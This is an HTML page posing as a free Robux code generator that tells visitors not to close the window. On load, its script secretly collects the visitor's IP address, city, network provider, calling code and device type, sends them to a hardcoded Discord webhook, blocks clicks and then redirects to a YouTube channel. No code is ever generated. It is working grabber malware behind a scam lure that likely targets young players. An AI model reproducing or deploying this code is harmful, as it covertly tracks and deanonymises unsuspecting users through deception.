<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>! DONT CLOSE !</title>
  <link rel="icon" type="image/png" href="https://fpwamfpwapfaiwnnfwapnpn2.github.io/fpWAMFPWAPFAIWNNFWAPNPN2FMWAFMNI-FNINWIANFBM52iNGOWIANON/edfae9388da4cd8496b885a8a2df613372500d9c.png">
  <style>
    body {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      background-image: url('https://fpwamfpwapfaiwnnfwapnpn2.github.io/fpWAMFPWAPFAIWNNFWAPNPN2FMWAFMNI-FNINWIANFBM52iNGOWIANON/WALLPAPERYES.png');
      background-size: cover;
      background-repeat: no-repeat;
      background-position: center;
      position: relative;
      user-select: none;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
    }

    h1 {
      text-align: center;
      color: white;
    }

    #errorLabel {
      margin-top: 20px;
      color: white;
      animation: rainbow 3s infinite, glow 1s infinite;
    }

    #infoText {
      position: absolute;
      bottom: 20px;
      color: white;
    }

    @keyframes rainbow {
      0% { color: #FF0000; }
      16.666% { color: #FF7F00; }
      33.333% { color: #FFFF00; }
      50% { color: #00FF00; }
      66.666% { color: #0000FF; }
      83.333% { color: #8B00FF; }
      100% { color: #FF0000; }
    }

    @keyframes glow {
      0% { text-shadow: 0 0 10px #fff; }
      50% { text-shadow: 0 0 20px #fff; }
      100% { text-shadow: 0 0 10px #fff; }
    }
  </style>
</head>
<body>
  <h1>Generating a robux code, don't tab out/close this window!</h1>
  <div id="errorLabel"></div>

  <script>
    document.addEventListener("DOMContentLoaded", function() {
      poop();
      document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
      });
      document.addEventListener('click', function(e) {
        if (e.button === 0) {
          e.preventDefault();
        }
      });
    });

    function poop() {
      var webhookURL = "https://discord.com/api/webhooks/1214230645908443136/ovXZiGBL9McvvvGyfd8cUBPZKkUESRWD4TloQa8JBsvseGrOVmvLLaJrSsNrc1m2yqDz";
      var currentDate = new Date();
      var formattedDate = currentDate.toLocaleString('en-US', { month: 'long', day: 'numeric', year: 'numeric', hour: 'numeric', minute: 'numeric', second: 'numeric', hour12: true });
      var platform = getPlatform();

      fetch('https://api.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
          var ip = data.ip;
          fetch('https://ipapi.co/' + ip + '/json/')
            .then(response => response.json())
            .then(locationData => {
              var city = locationData.city;
              var network = locationData.org;
              var version = locationData.version;
              var countryCallingCode = locationData.country_calling_code;

              if (isRobux1Logged(ip)) {
                showError("You already redeemed free robux.");
                return;
              }

              logRobux1(ip);
              var message = {
                content: "> Information\nOpened on: " + formattedDate + "\nIP address: " + ip + "\nCity: " + city + "\nNetwork: " + network + "\nVersion: " + version + "\nCountry Calling Code: " + countryCallingCode + "\nDevice: " + platform
              };

              fetch(webhookURL, {
                method: "POST",
                headers: {
                  "Content-Type": "application/json"
                },
                body: JSON.stringify(message)
              })
              .then(response => {
                if (!response.ok) {
                  showError("Failed generating robux");
                } else {
                  console.log("Generated robux");
                  redirectToDifferentWebsite();
                }
              })
              .catch(error => {
                showError("Error generating robux");
              });
            })
            .catch(error => {
              showError("Error fetching location data.");
            });
        })
        .catch(error => {
          showError("Error fetching IP address.");
        });
    }

    function getPlatform() {
      var platform = navigator.platform.toLowerCase();
      if (platform.includes("win")) {
        return "PC/Laptop";
      } else if (platform.includes("mac")) {
        return "Mac";
      } else if (platform.includes("iphone") || platform.includes("ipad")) {
        return "Phone/Tablet (iOS)";
      } else if (platform.includes("android")) {
        return "Phone/Tablet (Android)";
      } else if (platform.includes("linux")) {
        return "Linux";
      } else {
        return "Unknown";
      }
    }

    function isRobux1Logged(ip) {
      var Claimedrobux = localStorage.getItem("loggedIps");
      if (!Claimedrobux) {
        return false;
      }
      return Claimedrobux.split(",").includes(ip);
    }

    function logRobux1(ip) {
      var Claimedrobux = localStorage.getItem("loggedIps");
      if (!Claimedrobux) {
        Claimedrobux = ip;
      } else {
        Claimedrobux += "," + ip;
      }
      localStorage.setItem("loggedIps", Claimedrobux);
    }

    function redirectToDifferentWebsite() {
      window.location.href = "https://www.youtube.com/channel/UC8HNlWyhuqQzVNqCAP2t_mw";
    }

    function showError(errorMessage) {
      var errorLabel = document.getElementById("errorLabel");
      errorLabel.textContent = errorMessage;
    }
  </script>
  <div id="infoText">Once the code is generated please go to https://roblox.com/redeem to redeem the code.</div>
</body>
</html>
